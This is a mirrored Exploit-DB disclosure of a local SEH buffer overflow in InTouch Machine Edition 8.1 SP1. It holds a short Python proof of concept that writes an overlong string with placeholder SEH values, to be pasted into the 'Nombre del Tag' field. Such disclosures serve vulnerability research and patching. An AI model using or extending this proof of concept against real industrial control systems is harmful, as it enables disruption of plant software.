InTouch Machine Edition 8.1 SP1 – ‘Nombre del Tag’ Buffer Overflow (SEH)

  • 作者: Luis Martínez
    日期: 2018-09-11
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/45378/
  • # Exploit Title: InTouch Machine Edition 8.1 SP1 - 'Nombre del Tag' Buffer Overflow (SEH)
    # Discovery by: Luis Martinez
    # Discovery Date: 2018-09-10
    # Vendor Homepage: https://on.wonderware.com/
    # Software Link: https://on.wonderware.com/intouch-machine-edition
    # Tested Version: 8.1 SP1
    # Vulnerability Type: Local Buffer Overflow (SEH Unicode)
    # Tested on OS: Windows 10 Pro x64 en
     
    # Steps to Produce the Local Buffer Overflow (SEH Unicode): 
    # 1.- Run python code: InTouch_Machine_Edition_8.1.py
    # 2.- Open InTouch_Machine_Edition_8.1.txt and copy content to clipboard
    # 3.- Open ITME v8.1 InTouch Machine Edition
    # 4.- Inicio
    # 5.- Paste ClipBoard on "Nombre del Tag"
     
    #!/usr/bin/env python
    
    nSEH = "\x42\x42"
    SEH = "\x43\x43"
     
    buffer = "\x41" * 1042 + nSEH + SEH
    f = open ("InTouch_Machine_Edition_8.1.txt", "w")
    f.write(buffer)
    f.close()